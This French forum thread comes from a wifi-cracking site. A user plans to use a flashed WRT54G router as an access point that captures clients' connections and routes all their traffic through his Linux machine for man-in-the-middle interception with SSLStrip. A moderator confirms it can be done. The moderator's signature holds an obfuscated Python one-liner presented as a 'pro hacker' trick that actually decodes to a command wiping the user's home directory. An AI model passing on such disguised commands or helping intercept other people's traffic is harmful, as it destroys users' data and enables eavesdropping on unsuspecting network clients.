Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 25-01-2012 15:43:20

reallife
Membre Indétronable

WRT54G mode transparent ?

Salut!

Voila je souhaite faire un point d'accès afin de récuperer les connexions de clients et pouvoir les exploiter avec mon PC Backtrack en MITM.

En fait je dispose déjà de 3 Alfa AWUS036h, mais que ce soit sous linux ou windows en créant un AP avec airbase ou avec le logiciel de chez alfa, la connexion n'est pas vraiment stable et le débit médiocre.

Je souhaite donc me tourner vers ce routeur, et j'ai quelques questions...

Une fois flashé, est-il possible de rediriger tout le trafic sur mon PC Linux afin de l'exploiter (SSLStrip par exemple).
De plus, est-il possible que mon Linux fasse serveur DHCP, et que je puisse lire les IP des clients en MITM (en gros que le WRT54 ne fasse pas de NAT, mais qu'il soit un simple Pont au niveau de la couche physique avec mon Linux??

Merci!

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 25-01-2012 16:39:13

spawn
Modérateur

Re : WRT54G mode transparent ?

Q1 - Oui.
Q1 Bis - Oui.
Q2 - Oui, mais ce n'est (à mon humble niveau) vraiment pas simple.

lol

En cas de souci, n'hésite pas à retrouver le courage ici wink

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 25-01-2012 18:13:39

reallife
Membre Indétronable

Re : WRT54G mode transparent ?

Merci,

Je viens de me procurer un WRT54GL, je vais donc bientot le flasher.
Pour l'histoire de pont tant pis.

La seule chose qui m'interesse est que le routeur me renvoie tout le trafic sur ma machine Linux (qui sera MITM) et c'est sur ma machine Linux que je routerai les paquets sur internet (ou mon propre serveur Web wink)

Si tu me dis que cela est possible, alors tout va bien smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.02 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]